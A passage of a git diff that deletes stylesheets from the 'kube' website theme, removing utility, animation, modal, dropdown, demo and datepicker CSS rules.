-  -webkit-font-smoothing: antialiased;
-  -moz-osx-font-smoothing: grayscale; }
-
-.kube-calendar:before {
-  content: "\e900"; }
-
-.caret.down:before,
-.kube-caret-down:before {
-  content: "\e901"; }
-
-.caret.left:before,
-.kube-caret-left:before {
-  content: "\e902"; }
-
-.caret.right:before,
-.kube-caret-right:before {
-  content: "\e903"; }
-
-.caret.up:before,
-.kube-caret-up:before {
-  content: "\e904"; }
-
-.close:before,
-.kube-close:before {
-  content: "\e905"; }
-
-.kube-menu:before {
-  content: "\e906"; }
-
-.kube-search:before {
-  content: "\e907"; }
-
-.gutters .column.push-left,
-.push-left {
-  margin-right: auto; }
-
-.gutters .column.push-right,
-.push-right {
-  margin-left: auto; }
-
-.gutters .column.push-center,
-.push-center {
-  margin-left: auto;
-  margin-right: auto; }
-
-.gutters .column.push-middle,
-.push-middle {
-  margin-top: auto;
-  margin-bottom: auto; }
-
-.push-bottom {
-  margin-top: auto; }
-
-@media (max-width: 768px) {
-  .gutters .column.push-left-sm,
-  .push-left-sm {
-    margin-left: 0; }
-  .gutters .column.push-center-sm,
-  .push-center-sm {
-    margin-left: auto;
-    margin-right: auto; }
-  .push-top-sm {
-    margin-top: 0; } }
-
-.align-middle {
-  align-items: center; }
-
-.align-right {
-  justify-content: flex-end; }
-
-.align-center {
-  justify-content: center; }
-
-@media (max-width: 768px) {
-  .align-left-sm {
-    justify-content: flex-start; } }
-
-.float-right {
-  float: right; }
-
-.float-left {
-  float: left; }
-
-@media (max-width: 768px) {
-  .float-right {
-    float: none; }
-  .float-left {
-    float: none; } }
-
-.fixed {
-  position: fixed;
-  top: 0;
-  left: 0;
-  z-index: 100;
-  width: 100%; }
-
-.w5 {
-  width: 5%; }
-
-.w10 {
-  width: 10%; }
-
-.w15 {
-  width: 15%; }
-
-.w20 {
-  width: 20%; }
-
-.w25 {
-  width: 25%; }
-
-.w30 {
-  width: 30%; }
-
-.w35 {
-  width: 35%; }
-
-.w40 {
-  width: 40%; }
-
-.w45 {
-  width: 45%; }
-
-.w50 {
-  width: 50%; }
-
-.w55 {
-  width: 55%; }
-
-.w60 {
-  width: 60%; }
-
-.w65 {
-  width: 65%; }
-
-.w70 {
-  width: 70%; }
-
-.w75 {
-  width: 75%; }
-
-.w80 {
-  width: 80%; }
-
-.w85 {
-  width: 85%; }
-
-.w90 {
-  width: 90%; }
-
-.w95 {
-  width: 95%; }
-
-.w100 {
-  width: 100%; }
-
-.w-auto {
-  width: auto; }
-
-.w-small {
-  width: 480px; }
-
-.w-medium {
-  width: 600px; }
-
-.w-big {
-  width: 740px; }
-
-.w-large {
-  width: 840px; }
-
-@media (max-width: 768px) {
-  .w-auto-sm {
-    width: auto; }
-  .w100-sm,
-  .w-small,
-  .w-medium,
-  .w-big,
-  .w-large {
-    width: 100%; } }
-
-.max-w5 {
-  max-width: 5%; }
-
-.max-w10 {
-  max-width: 10%; }
-
-.max-w15 {
-  max-width: 15%; }
-
-.max-w20 {
-  max-width: 20%; }
-
-.max-w25 {
-  max-width: 25%; }
-
-.max-w30 {
-  max-width: 30%; }
-
-.max-w35 {
-  max-width: 35%; }
-
-.max-w40 {
-  max-width: 40%; }
-
-.max-w45 {
-  max-width: 45%; }
-
-.max-w50 {
-  max-width: 50%; }
-
-.max-w55 {
-  max-width: 55%; }
-
-.max-w60 {
-  max-width: 60%; }
-
-.max-w65 {
-  max-width: 65%; }
-
-.max-w70 {
-  max-width: 70%; }
-
-.max-w75 {
-  max-width: 75%; }
-
-.max-w80 {
-  max-width: 80%; }
-
-.max-w85 {
-  max-width: 85%; }
-
-.max-w90 {
-  max-width: 90%; }
-
-.max-w95 {
-  max-width: 95%; }
-
-.max-w100 {
-  max-width: 100%; }
-
-.max-w-small {
-  max-width: 480px; }
-
-.max-w-medium {
-  max-width: 600px; }
-
-.max-w-big {
-  max-width: 740px; }
-
-.max-w-large {
-  max-width: 840px; }
-
-@media (max-width: 768px) {
-  .max-w-auto-sm,
-  .max-w-small,
-  .max-w-medium,
-  .max-w-big,
-  .max-w-large {
-    max-width: auto; } }
-
-.min-w5 {
-  min-width: 5%; }
-
-.min-w10 {
-  min-width: 10%; }
-
-.min-w15 {
-  min-width: 15%; }
-
-.min-w20 {
-  min-width: 20%; }
-
-.min-w25 {
-  min-width: 25%; }
-
-.min-w30 {
-  min-width: 30%; }
-
-.min-w35 {
-  min-width: 35%; }
-
-.min-w40 {
-  min-width: 40%; }
-
-.min-w45 {
-  min-width: 45%; }
-
-.min-w50 {
-  min-width: 50%; }
-
-.min-w55 {
-  min-width: 55%; }
-
-.min-w60 {
-  min-width: 60%; }
-
-.min-w65 {
-  min-width: 65%; }
-
-.min-w70 {
-  min-width: 70%; }
-
-.min-w75 {
-  min-width: 75%; }
-
-.min-w80 {
-  min-width: 80%; }
-
-.min-w85 {
-  min-width: 85%; }
-
-.min-w90 {
-  min-width: 90%; }
-
-.min-w95 {
-  min-width: 95%; }
-
-.min-w100 {
-  min-width: 100%; }
-
-.h25 {
-  height: 25%; }
-
-.h50 {
-  height: 50%; }
-
-.h100 {
-  height: 100%; }
-
-.group:after {
-  content: '';
-  display: table;
-  clear: both; }
-
-.flex {
-  display: flex; }
-
-@media (max-width: 768px) {
-  .flex-column-sm {
-    flex-direction: column; }
-  .flex-w100-sm {
-    flex: 0 0 100%; } }
-  @media (max-width: 768px) and (max-width: 768px) {
-    .flex-w100-sm {
-      flex: 0 0 100% !important; } }
-
-.invisible {
-  visibility: hidden; }
-
-.visible {
-  visibility: visible; }
-
-.display-block {
-  display: block; }
-
-.hide {
-  display: none !important; }
-
-@media (max-width: 768px) {
-  .hide-sm {
-    display: none !important; } }
-
-@media (min-width: 768px) {
-  .show-sm {
-    display: none !important; } }
-
-@media print {
-  .hide-print {
-    display: none !important; }
-  .show-print {
-    display: block !important; } }
-
-.no-scroll {
-  overflow: hidden;
-  position: fixed;
-  top: 0;
-  left: 0;
-  width: 100%;
-  height: 100% !important; }
-
-.scrollbar-measure {
-  position: absolute;
-  top: -9999px;
-  width: 50px;
-  height: 50px;
-  overflow: scroll; }
-
-.video-container {
-  height: 0;
-  padding-bottom: 56.25%;
-  position: relative;
-  margin-bottom: 16px; }
-  .video-container iframe,
-  .video-container object,
-  .video-container embed {
-    position: absolute;
-    top: 0;
-    left: 0;
-    width: 100% !important;
-    height: 100% !important; }
-
-.close {
-  display: inline-block;
-  min-height: 16px;
-  min-width: 16px;
-  line-height: 16px;
-  vertical-align: middle;
-  text-align: center;
-  font-size: 12px;
-  opacity: .6; }
-  .close:hover {
-    opacity: 1; }
-  .close.small {
-    font-size: 8px; }
-  .close.big {
-    font-size: 18px; }
-  .close.white {
-    color: #fff; }
-
-.caret {
-  display: inline-block; }
-
-.button .caret {
-  margin-right: -8px; }
-
-.overlay {
-  position: fixed;
-  z-index: 200;
-  top: 0;
-  left: 0;
-  right: 0;
-  bottom: 0;
-  background-color: rgba(255, 255, 255, 0.95); }
-  .overlay > .close {
-    position: fixed;
-    top: 1rem;
-    right: 1rem; }
-
-@media print {
-  * {
-    background: transparent !important;
-    color: black !important;
-    box-shadow: none !important;
-    text-shadow: none !important; }
-  a,
-  a:visited {
-    text-decoration: underline; }
-  pre, blockquote {
-    border: 1px solid #999;
-    page-break-inside: avoid; }
-  p, h2, h3 {
-    orphans: 3;
-    widows: 3; }
-  thead {
-    display: table-header-group; }
-  tr, img {
-    page-break-inside: avoid; }
-  img {
-    max-width: 100% !important; }
-  h2, h3, h4 {
-    page-break-after: avoid; }
-  @page {
-    margin: 0.5cm; } }
-
-@keyframes slideUp {
-  to {
-    height: 0;
-    padding-top: 0;
-    padding-bottom: 0; } }
-
-@keyframes slideDown {
-  from {
-    height: 0;
-    padding-top: 0;
-    padding-bottom: 0; } }
-
-@keyframes fadeIn {
-  from {
-    opacity: 0; }
-  to {
-    opacity: 1; } }
-
-@keyframes fadeOut {
-  from {
-    opacity: 1; }
-  to {
-    opacity: 0; } }
-
-@keyframes flipIn {
-  from {
-    opacity: 0;
-    transform: scaleY(0); }
-  to {
-    opacity: 1;
-    transform: scaleY(1); } }
-
-@keyframes flipOut {
-  from {
-    opacity: 1;
-    transform: scaleY(1); }
-  to {
-    opacity: 0;
-    transform: scaleY(0); } }
-
-@keyframes zoomIn {
-  from {
-    opacity: 0;
-    transform: scale3d(0.3, 0.3, 0.3); }
-  50% {
-    opacity: 1; } }
-
-@keyframes zoomOut {
-  from {
-    opacity: 1; }
-  50% {
-    opacity: 0;
-    transform: scale3d(0.3, 0.3, 0.3); }
-  to {
-    opacity: 0; } }
-
-@keyframes slideInRight {
-  from {
-    transform: translate3d(100%, 0, 0);
-    visibility: visible; }
-  to {
-    transform: translate3d(0, 0, 0); } }
-
-@keyframes slideInLeft {
-  from {
-    transform: translate3d(-100%, 0, 0);
-    visibility: visible; }
-  to {
-    transform: translate3d(0, 0, 0); } }
-
-@keyframes slideInDown {
-  from {
-    transform: translate3d(0, -100%, 0);
-    visibility: visible; }
-  to {
-    transform: translate3d(0, 0, 0); } }
-
-@keyframes slideOutLeft {
-  from {
-    transform: translate3d(0, 0, 0); }
-  to {
-    visibility: hidden;
-    transform: translate3d(-100%, 0, 0); } }
-
-@keyframes slideOutRight {
-  from {
-    transform: translate3d(0, 0, 0); }
-  to {
-    visibility: hidden;
-    transform: translate3d(100%, 0, 0); } }
-
-@keyframes slideOutUp {
-  from {
-    transform: translate3d(0, 0, 0); }
-  to {
-    visibility: hidden;
-    transform: translate3d(0, -100%, 0); } }
-
-@keyframes rotate {
-  from {
-    transform: rotate(0deg); }
-  to {
-    transform: rotate(360deg); } }
-
-@keyframes pulse {
-  from {
-    transform: scale3d(1, 1, 1); }
-  50% {
-    transform: scale3d(1.03, 1.03, 1.03); }
-  to {
-    transform: scale3d(1, 1, 1); } }
-
-@keyframes shake {
-  15% {
-    transform: translateX(0.5rem); }
-  30% {
-    transform: translateX(-0.4rem); }
-  45% {
-    transform: translateX(0.3rem); }
-  60% {
-    transform: translateX(-0.2rem); }
-  75% {
-    transform: translateX(0.1rem); }
-  90% {
-    transform: translateX(0); }
-  90% {
-    transform: translateX(0); } }
-
-.fadeIn {
-  animation: fadeIn 250ms; }
-
-.fadeOut {
-  animation: fadeOut 250ms; }
-
-.zoomIn {
-  animation: zoomIn 200ms; }
-
-.zoomOut {
-  animation: zoomOut 500ms; }
-
-.slideInRight {
-  animation: slideInRight 500ms; }
-
-.slideInLeft {
-  animation: slideInLeft 500ms; }
-
-.slideInDown {
-  animation: slideInDown 500ms; }
-
-.slideOutLeft {
-  animation: slideOutLeft 500ms; }
-
-.slideOutRight {
-  animation: slideOutRight 500ms; }
-
-.slideOutUp {
-  animation: slideOutUp 500ms; }
-
-.slideUp {
-  overflow: hidden;
-  animation: slideUp 200ms ease-in-out; }
-
-.slideDown {
-  overflow: hidden;
-  animation: slideDown 80ms ease-in-out; }
-
-.flipIn {
-  animation: flipIn 250ms cubic-bezier(0.5, -0.5, 0.5, 1.5); }
-
-.flipOut {
-  animation: flipOut 500ms cubic-bezier(0.5, -0.5, 0.5, 1.5); }
-
-.rotate {
-  animation: rotate 500ms; }
-
-.pulse {
-  animation: pulse 250ms 2; }
-
-.shake {
-  animation: shake 500ms; }
-
-.dropdown {
-  position: absolute;
-  z-index: 100;
-  top: 0;
-  right: 0;
-  width: 280px;
-  color: #000;
-  font-size: 15px;
-  background: #fff;
-  box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
-  border-radius: 3px;
-  max-height: 300px;
-  margin: 0;
-  padding: 0;
-  overflow: hidden; }
-  .dropdown.dropdown-mobile {
-    position: fixed;
-    top: 0;
-    left: 0;
-    right: 0;
-    bottom: 0;
-    width: 100%;
-    max-height: none;
-    border: none; }
-  .dropdown .close {
-    margin: 20px auto; }
-  .dropdown.open {
-    overflow: auto; }
-  .dropdown ul {
-    list-style: none;
-    margin: 0; }
-    .dropdown ul li {
-      border-bottom: 1px solid rgba(0, 0, 0, 0.07); }
-      .dropdown ul li:last-child {
-        border-bottom: none; }
-    .dropdown ul a {
-      display: block;
-      padding: 12px;
-      text-decoration: none;
-      color: #000; }
-      .dropdown ul a:hover {
-        background: rgba(0, 0, 0, 0.05); }
-
-.message {
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 14px;
-  line-height: 20px;
-  background: #e0e1e1;
-  color: #313439;
-  padding: 1rem;
-  padding-right: 2.5em;
-  padding-bottom: .75rem;
-  margin-bottom: 24px;
-  position: relative; }
-  .message a {
-    color: inherit; }
-  .message h2,
-  .message h3,
-  .message h4,
-  .message h5,
-  .message h6 {
-    margin-bottom: 0; }
-  .message .close {
-    position: absolute;
-    right: 1rem;
-    top: 1.1rem; }
-
-.message.error {
-  background: #f03c69;
-  color: #fff; }
-
-.message.success {
-  background: #35beb1;
-  color: #fff; }
-
-.message.warning {
-  background: #f7ba45; }
-
-.message.focus {
-  background: #1c86f2;
-  color: #fff; }
-
-.message.black {
-  background: #0d0d0e;
-  color: #fff; }
-
-.message.inverted {
-  background: #fff; }
-
-.modal-box {
-  position: fixed;
-  top: 0;
-  left: 0;
-  bottom: 0;
-  right: 0;
-  overflow-x: hidden;
-  overflow-y: auto;
-  z-index: 200; }
-
-.modal {
-  position: relative;
-  margin: auto;
-  margin-top: 16px;
-  padding: 0;
-  background: #fff;
-  box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
-  border-radius: 8px;
-  color: #000; }
-  @media (max-width: 768px) {
-    .modal input,
-    .modal textarea {
-      font-size: 16px; } }
-  .modal .close {
-    position: absolute;
-    top: 18px;
-    right: 16px;
-    opacity: .3; }
-    .modal .close:hover {
-      opacity: 1; }
-
-.modal-header {
-  padding: 24px 32px;
-  font-size: 18px;
-  font-weight: bold;
-  border-bottom: 1px solid rgba(0, 0, 0, 0.05); }
-  .modal-header:empty {
-    display: none; }
-
-.modal-body {
-  padding: 36px 56px; }
-
-@media (max-width: 768px) {
-  .modal-header,
-  .modal-body {
-    padding: 24px; } }
-
-.offcanvas {
-  background: #fff;
-  position: fixed;
-  padding: 24px;
-  height: 100%;
-  top: 0;
-  left: 0;
-  z-index: 300;
-  overflow-y: scroll; }
-
-.offcanvas .close {
-  position: absolute;
-  top: 8px;
-  right: 8px; }
-
-.offcanvas-left {
-  border-right: 1px solid rgba(0, 0, 0, 0.1); }
-
-.offcanvas-right {
-  left: auto;
-  right: 0;
-  border-left: 1px solid rgba(0, 0, 0, 0.1); }
-
-.offcanvas-push-body {
-  position: relative; }
-
-.tabs {
-  margin-bottom: 24px;
-  font-size: 14px; }
-  .tabs li em,
-  .tabs li.active a {
-    color: #313439;
-    border: 1px solid rgba(0, 0, 0, 0.1);
-    cursor: default;
-    text-decoration: none;
-    background: none; }
-  .tabs em,
-  .tabs a {
-    position: relative;
-    top: 1px;
-    font-style: normal;
-    display: block;
-    padding: .5rem 1rem;
-    border: 1px solid transparent;
-    color: rgba(0, 0, 0, 0.5);
-    text-decoration: none; }
-  .tabs a:hover {
-    -moz-transition: all linear 0.2s;
-    transition: all linear 0.2s;
-    color: #313439;
-    text-decoration: underline;
-    background-color: #e0e1e1; }
-
-@media (min-width: 768px) {
-  .tabs ul {
-    display: flex;
-    margin-top: -1px;
-    border-bottom: 1px solid rgba(0, 0, 0, 0.1); }
-  .tabs li em,
-  .tabs li.active a {
-    border-bottom: 1px solid #fff; } }
diff --git a/website/src/themes/kube/static/css/kube.demo.css b/website/src/themes/kube/static/css/kube.demo.css
deleted file mode 100644
index f4abaec883..0000000000
--- a/website/src/themes/kube/static/css/kube.demo.css
+++ /dev/null
@@ -1,404 +0,0 @@
-body {
-  font-family: Lato, sans-serif; }
-
-h1.title, h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
-  font-family: Lato, sans-serif; }
-
-button, .button {
-  font-family: Lato, sans-serif; }
-
-.media {
-  padding: 24px;
-  border: 1px solid rgba(0, 0, 0, 0.07);
-  border-radius: 3px;
-  margin-bottom: 24px;
-  max-width: 400px;
-  display: flex;
-  align-items: flex-start; }
-  .media img {
-    margin: 4px 0; }
-  .media .media-body {
-    margin-left: 16px; }
-    .media .media-body h5 {
-      margin-bottom: 0; }
-    .media .media-body p {
-      margin-bottom: 0; }
-
-.section-head {
-  font-size: 24px;
-  line-height: 32px;
-  margin-top: 48px;
-  font-weight: 900; }
-  .section-head:after {
-    content: '#';
-    font-size: 15px;
-    font-weight: normal;
-    line-height: 1;
-    color: rgba(0, 0, 0, 0.3);
-    margin-left: 8px;
-    position: relative;
-    top: -1px; }
-  .section-head a {
-    text-decoration: none; }
-
-.section-item-desc {
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 12px;
-  color: rgba(0, 0, 0, 0.5); }
-
-.example {
-  border: 1px solid rgba(0, 0, 0, 0.07);
-  padding: 32px;
-  margin-bottom: 16px; }
-  .example pre.code {
-    margin-top: 40px;
-    margin-bottom: 0;
-    background: none;
-    padding: 0; }
-  .example.bg-darkgray {
-    background: #313439; }
-    .example.bg-darkgray pre.code {
-      color: rgba(255, 255, 255, 0.85); }
-
-.demo-muted-link,
-.demo-muted-link:hover {
-  text-decoration: none;
-  color: rgba(0, 0, 0, 0.3); }
-
-.demo-animation-wrap {
-  margin-bottom: 24px; }
-  .demo-animation-wrap:after {
-    content: '';
-    display: table;
-    clear: both; }
-
-.demo-animation-box {
-  float: left;
-  margin-right: 16px;
-  width: 202px;
-  height: 82px;
-  border: 1px dashed rgba(0, 0, 0, 0.15); }
-  .demo-animation-box > div {
-    width: 200px;
-    height: 80px;
-    background: #f8f8f8;
-    text-align: center;
-    line-height: 80px;
-    color: rgba(0, 0, 0, 0.4);
-    font-size: 18px; }
-
-.demo-animation-btn {
-  font-size: 13px;
-  text-transform: uppercase;
-  font-weight: bold;
-  display: inline-block;
-  width: 200px;
-  margin-right: 16px; }
-
-.demo-sizing > div {
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 11px;
-  padding-left: 4px;
-  background: #d8e9fa;
-  margin-bottom: 4px; }
-
-.demo-grid .row {
-  margin-bottom: 4px;
-  background: #ebf4fc; }
-
-.demo-grid .row.gutters {
-  background: none; }
-
-.demo-grid .col {
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 12px;
-  padding: 8px 12px;
-  background: #d8e9fa;
-  border-left: 1px solid rgba(0, 0, 0, 0.1); }
-
-.demo-grid .demo-col-nested {
-  border-left: none;
-  padding: 0; }
-  .demo-grid .demo-col-nested .row {
-    margin-bottom: 0; }
-
-#demo-container {
-  display: flex;
-  flex-direction: row;
-  flex-wrap: wrap; }
-
-#demo-sidebar {
-  flex: 0 0 300px;
-  background: #c4def7; }
-
-#demo-content {
-  flex: auto;
-  background: #ebf4fc; }
-
-#demo-sidebar,
-#demo-content {
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 12px;
-  padding: 8px 12px;
-  min-height: 80px; }
-
-#demo-media-grid {
-  -webkit-column-count: 2;
-  -moz-column-count: 2;
-  column-count: 2;
-  -webkit-column-gap: 2%;
-  -moz-column-gap: 2%;
-  column-gap: 2%; }
-  #demo-media-grid > div {
-    display: inline-block;
-    width: 100%; }
-  @media (max-width: 768px) {
-    #demo-media-grid {
-      -webkit-column-count: 1;
-      -moz-column-count: 1;
-      column-count: 1; } }
-  #demo-media-grid > div {
-    font-family: Consolas, Monaco, "Courier New", monospace;
-    font-size: 12px;
-    padding: 8px 12px;
-    background: #eae2f2;
-    text-align: center;
-    margin-bottom: 20px;
-    height: 80px; }
-  #demo-media-grid > div:nth-child(2n) {
-    height: 200px; }
-  #demo-media-grid > div:nth-child(5n) {
-    height: 120px; }
-
-.button.red {
-  color: #fff;
-  background-color: #ff3366; }
-  .button.red:hover {
-    color: #fff;
-    background-color: #ff99b3; }
-  .button.red:disabled, .button.red.disabled {
-    color: rgba(255, 255, 255, 0.7);
-    background-color: rgba(255, 51, 102, 0.7); }
-  .button.red.outline {
-    background: none;
-    color: #ff3366;
-    border-color: #ff3366; }
-    .button.red.outline:hover {
-      color: rgba(255, 51, 102, 0.6);
-      border-color: rgba(255, 51, 102, 0.5); }
-    .button.red.outline:disabled, .button.red.outline.disabled {
-      background: none;
-      color: rgba(255, 51, 102, 0.7);
-      border-color: rgba(255, 51, 102, 0.5); }
-
-.label.custom {
-  background: #ea48a7;
-  color: #fff; }
-  .label.custom.tag, .label.custom.outline {
-    background: none;
-    border-color: #ea48a7;
-    color: #ea48a7; }
-
-#breadcrumbs-custom-separator li:after {
-  content: '>'; }
-
-.demo-gradient {
-  height: 40px;
-  margin-bottom: 24px; }
-
-.demo-gradient-vertical {
-  background-color: #5faac8;
-  background-image: linear-gradient(to bottom, #5faac8 0%, #65ccb8 100%); }
-
-.demo-gradient-vertical-to-opacity {
-  background: linear-gradient(to bottom, #5faac8 0%, rgba(95, 170, 200, 0) 100%); }
-
-.demo-gradient-horizontal {
-  background-color: #5faac8;
-  background: linear-gradient(to right, #5faac8 0%, #65ccb8 100%); }
-
-.demo-gradient-horizontal-to-opacity {
-  background: linear-gradient(to right, #5faac8 0%, rgba(95, 170, 200, 0) 100%); }
-
-.demo-gradient-radial {
-  background-image: radial-gradient(circle, #5faac8, #65ccb8); }
-
-.example-inverted-box {
-  display: inline-block;
-  padding: 6px 8px 6px 8px;
-  line-height: 1;
-  vertical-align: middle;
-  background: #d4d4d4; }
-
-#livetabs {
-  margin-bottom: 24px;
-  font-size: 14px; }
-
-#livetabs ul {
-  display: flex; }
-
-#livetabs a {
-  color: #000;
-  text-decoration: none;
-  background: #f4f4f4;
-  border-radius: 4px;
-  padding: 4px 12px;
-  border: 1px solid transparent; }
-  #livetabs a:hover {
-    opacity: .7; }
-
-#livetabs li {
-  margin-right: 4px; }
-
-#livetabs li.active a {
-  background: #fff;
-  border-color: #eee;
-  color: rgba(0, 0, 0, 0.5);
-  cursor: default; }
-  #livetabs li.active a:hover {
-    opacity: 1; }
-
-.togglebox-box {
-  padding: 24px;
-  padding-bottom: 16px;
-  background: #f8f8f8;
-  margin-bottom: 24px; }
-
-#navbar-demo {
-  display: flex;
-  align-items: center;
-  background: #f8f8f8;
-  padding: 24px 20px;
-  margin-bottom: 24px; }
-
-#navbar-brand {
-  margin-right: 24px; }
-
-#navbar-main ul:after {
-  content: '';
-  display: table;
-  clear: both; }
-
-#navbar-main li {
-  float: left;
-  margin-right: 20px; }
-
-#navbar-demo.fixed {
-  background: rgba(255, 255, 255, 0.98);
-  box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2); }
-
-#navbar-main li a {
-  color: #000;
-  text-decoration: none;
-  display: block; }
-  #navbar-main li a:hover {
-    -moz-transition: all linear 0.2s;
-    transition: all linear 0.2s;
-    color: rgba(0, 0, 0, 0.6);
-    text-decoration: underline; }
-
-@media (max-width: 768px) {
-  #navbar-demo {
-    flex-direction: column;
-    text-align: center; }
-  #navbar-brand {
-    margin: 0;
-    margin-bottom: 20px; }
-  #navbar-main li {
-    float: none;
-    margin: 0;
-    margin-bottom: 20px; } }
-
-#demo-nav-collapse,
-#demo-nav-collapse ul {
-  margin-left: 0;
-  list-style: none; }
-
-#demo-nav-collapse li {
-  line-height: 32px; }
-
-#demo-nav-collapse ul {
-  margin-left: 20px;
-  font-size: 14px; }
-
-#demo-nav-collapse a {
-  color: #000;
-  text-decoration: none;
-  display: block; }
-  #demo-nav-collapse a:hover {
-    -moz-transition: all linear 0.2s;
-    transition: all linear 0.2s;
-    color: rgba(0, 0, 0, 0.6);
-    text-decoration: underline; }
-
-.my-collapse {
-  margin-bottom: 24px; }
-
-.my-collapse h4 {
-  background: #f4f4f4;
-  padding: 8px 16px;
-  margin-bottom: 1px;
-  font-size: 15px;
-  line-height: 24px; }
-
-.my-collapse h4 a {
-  text-decoration: none;
-  color: #000;
-  display: block; }
-
-.my-collapse div {
-  border: 1px solid rgba(0, 0, 0, 0.1);
-  padding: 24px 32px 1px;
-  margin-bottom: 1px; }
-
-.swatch-box {
-  text-align: center; }
-
-.swatch-item {
-  display: inline-block;
-  margin: 24px; }
-  .swatch-item h5 {
-    font-family: Consolas, Monaco, "Courier New", monospace;
-    font-weight: bold;
-    font-size: 14px;
-    line-height: 24px;
-    margin-bottom: 0; }
-  .swatch-item p {
-    font-family: Consolas, Monaco, "Courier New", monospace;
-    font-size: 12px;
-    line-height: 20px;
-    color: rgba(46, 47, 51, 0.65); }
-
-.swatch {
-  display: inline-block;
-  height: 120px;
-  width: 120px;
-  border-radius: 120px;
-  margin-bottom: 8px; }
-
-.swatch-bg-headings {
-  background: #0d0d0e; }
-
-.swatch-bg-text {
-  background: #313439; }
-
-.swatch-bg-link {
-  background: #007eff; }
-
-.swatch-bg-link-hover {
-  background: #ff3366; }
-
-.swatch-bg-button-primary {
-  background: #007eff; }
-
-.swatch-bg-button-secondary {
-  background: #313439; }
-
-.swatch-bg-inverted {
-  background: #fff; }
-
-.swatch-bg-inverted {
-  position: relative;
-  bottom: -8px;
-  margin-top: -8px;
-  border: 8px solid #f8f8f8; }
diff --git a/website/src/themes/kube/static/css/kube.legenda.css b/website/src/themes/kube/static/css/kube.legenda.css
deleted file mode 100644
index 5e5288ddeb..0000000000
--- a/website/src/themes/kube/static/css/kube.legenda.css
+++ /dev/null
@@ -1,406 +0,0 @@
-.autocomplete {
-  position: absolute;
-  z-index: 1000;
-  left: 0;
-  display: none;
-  margin: 0;
-  list-style: none;
-  background: #fff;
-  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);
-  max-height: 250px;
-  overflow: auto;
-  font-size: 14px; }
-  .autocomplete a {
-    padding: 4px 10px;
-    color: #000;
-    display: block;
-    text-decoration: none; }
-    .autocomplete a:hover {
-      background: rgba(0, 0, 0, 0.05); }
-    .autocomplete a.active {
-      background: #007eff;
-      color: #fff; }
-
-.cardform label {
-  display: block;
-  text-transform: uppercase;
-  font-size: 12px;
-  color: rgba(0, 0, 0, 0.5); }
-
-.cardform-view select,
-.cardform-view textarea,
-.cardform-view input {
-  border: none !important;
-  background: none;
-  padding: 0;
-  cursor: text;
-  -webkit-appearance: none; }
-  .cardform-view select:focus,
-  .cardform-view textarea:focus,
-  .cardform-view input:focus {
-    box-shadow: none;
-    background: none;
-    outline: none; }
-
-.cardform-controls {
-  margin-bottom: 24px; }
-
-.combobox {
-  position: relative; }
-  .combobox input {
-    padding-right: 32px;
-    width: 100%; }
-  .combobox .caret {
-    position: absolute;
-    z-index: 2;
-    top: 0;
-    right: 0;
-    height: 100%;
-    width: 32px; }
-  .combobox .caret:before {
-    top: 45%;
-    left: 12px; }
-
-.combobox-list {
-  z-index: 1000;
-  position: absolute;
-  left: 0;
-  margin: 0;
-  list-style: none;
-  background: #fff;
-  font-size: 14px;
-  width: 100%;
-  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);
-  max-height: 250px;
-  font-weight: normal;
-  overflow: auto; }
-  .combobox-list li {
-    padding: 4px 10px;
-    color: #000;
-    cursor: pointer; }
-    .combobox-list li:hover {
-      background: rgba(0, 0, 0, 0.05); }
-    .combobox-list li.active {
-      background: #007eff;
-      color: #fff; }
-
-.datepicker {
-  position: absolute;
-  background: #fff;
-  top: 0;
-  left: 0;
-  line-height: 24px;
-  padding: 20px 24px;
-  border-radius: 3px;
-  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); }
-  .datepicker.datepicker-embed {
-    position: static;
-    box-shadow: none;
-    border: 1px solid rgba(0, 0, 0, 0.1); }
-
-.datepicker-head {
-  position: relative;
-  padding-bottom: 8px; }
-
-.datepicker-controls {
-  position: absolute;
-  top: 0;
-  right: 0; }
-
-.datepicker-control {
-  float: left;
-  width: 24px;
-  height: 24px;
-  background: #eee;
-  border-radius: 3px;
-  text-align: center;
-  cursor: pointer;
-  -webkit-user-select: none;
-  -moz-user-select: none;
-  -khtml-user-select: none;
-  -ms-user-select: none;
-  user-select: none; }
-
-.datepicker-control-next {
-  margin-left: 4px; }
-
-.datepicker-month-box {
-  font-size: 14px;
-  color: #000;
-  font-weight: bold;
-  padding-left: 4px;
-  height: 24px; }
-
-.datepicker-select-year {
-  display: inline-block;
-  cursor: pointer;
-  background: #eee;
-  padding: 0 8px;
-  position: relative;
-  border-radius: 3px;
-  height: 24px;
-  line-height: 24px; }
-  .datepicker-select-year .datepicker-select-year-caret {
-    position: relative;
-    top: -1px;
-    display: inline-block;
-    width: 0;
-    height: 0;
-    margin-left: .3em;
-    vertical-align: middle;
-    border-top: 4px solid;
-    border-right: 4px solid transparent;
-    border-left: 4px solid transparent; }
-  .datepicker-select-year select {
-    z-index: 2;
-    position: absolute;
-    top: 0;
-    left: 0;
-    opacity: 0;
-    height: 24px;
-    -webkit-appearance: menulist-button;
-    -moz-appearance: menulist-button;
-    -ms-appearance: menulist-button;
-    appearance: menulist-button; }
-
-.datepicker-weekdays {
-  white-space: nowrap; }
-  .datepicker-weekdays span {
-    display: inline-block;
-    text-align: center;
-    width: 28px;
-    height: 28px;
-    margin: 0 2px;
-    font-size: 12px;
-    font-weight: bold;
-    color: rgba(0, 0, 0, 0.5); }
-
-.datepicker-row {
-  white-space: nowrap; }
-
-.datepicker-cell {
-  display: inline-block;
-  text-align: center;
-  width: 28px;
-  height: 28px;
-  margin: 0 2px;
-  font-size: 12px; }
-  .datepicker-cell a {
-    display: block;
-    color: #000;
-    text-decoration: none;
-    border-radius: 40px; }
-    .datepicker-cell a:hover {
-      background: #eee; }
-  .datepicker-cell.datepicker-day-hidden a {
-    visibility: hidden; }
-  .datepicker-cell.datepicker-day-weekend a {
-    color: rgba(0, 0, 0, 0.4);
-    font-weight: bold; }
-  .datepicker-cell.datepicker-day-today a {
-    background: #f23d3d;
-    color: #fff; }
